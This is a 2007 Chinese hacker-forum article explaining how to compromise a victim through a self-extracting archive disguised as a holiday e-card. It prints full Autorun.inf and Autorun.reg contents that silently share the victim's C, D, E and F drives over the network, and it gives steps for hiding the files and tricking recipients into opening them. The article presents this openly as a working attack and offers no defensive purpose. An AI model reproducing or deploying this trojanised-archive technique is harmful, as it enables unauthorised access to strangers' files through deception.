 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 通过自解压包来实现入侵 | |||||
作者:lvvl 文章来源:网络 点击数: 更新时间:2007-5-21  |
|||||
|
如果捆绑一个木马给别人,只要稍有常识的人有杀毒软件就可以识破。如果不用木马,用些批处理炸弹、碎片对象文件、或自导入注册表文件,就可以实现各种攻击。 把以下两行保存为Autorun.inf [Autorun] open=regedit /s Autorun.reg 把以下一段保存为Autorun.reg REGEDIT4 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$] "Path"="c:\\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000192 "Parm1enc"=hex: "Parm2enc"=hex: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$] "Path"="D:\\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000192 "Parm1enc"=hex: "Parm2enc"=hex: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$] "Path"="E:\\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000192 "Parm1enc"=hex: "Parm2enc"=hex: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$] "Path"="F:\\" "Remark"="" "Type"=dword:00000000 "Flags"=dword:00000192 "Parm1enc"=hex: "Parm2enc"=hex: 比如在当今电子贺卡漫天飞的时代,可以把你的自解压包命名为“猴年贺卡”,包里包个真贺卡,顺便把以上两个文件打包进去,注意要指定文件解包路径。当收贺卡人点击自解压包时真贺卡被解压的同时,两个文件就悄悄的被解到指定位置。Autorun.inf必须解到某一分区的根目录,名字不能变,可以设置文件隐藏属性。 Autorun.reg文件名和释放目录可以任意,可以更好的隐藏,注意Autorun.inf指向目录正确的地方。 当受害人双击有Autorun.inf的分区时,他的硬盘C、D、E、F分区就被打开公享。 |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 通过建立安全模型保障Web数据 黑客门引发人们关注 应通过有 QQ通行证木马通过伪装的页面 黑客通过窃听电话、电子邮件 恶意木马变种通过Skype大肆传 通过路由器保护内网安全九大 通过MSN传播的IRCBot msnmsg 警惕:又一个通过 MSN传播的 Skype首席安全官:目前还没有 众多病毒通过U盘传播4点建议 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
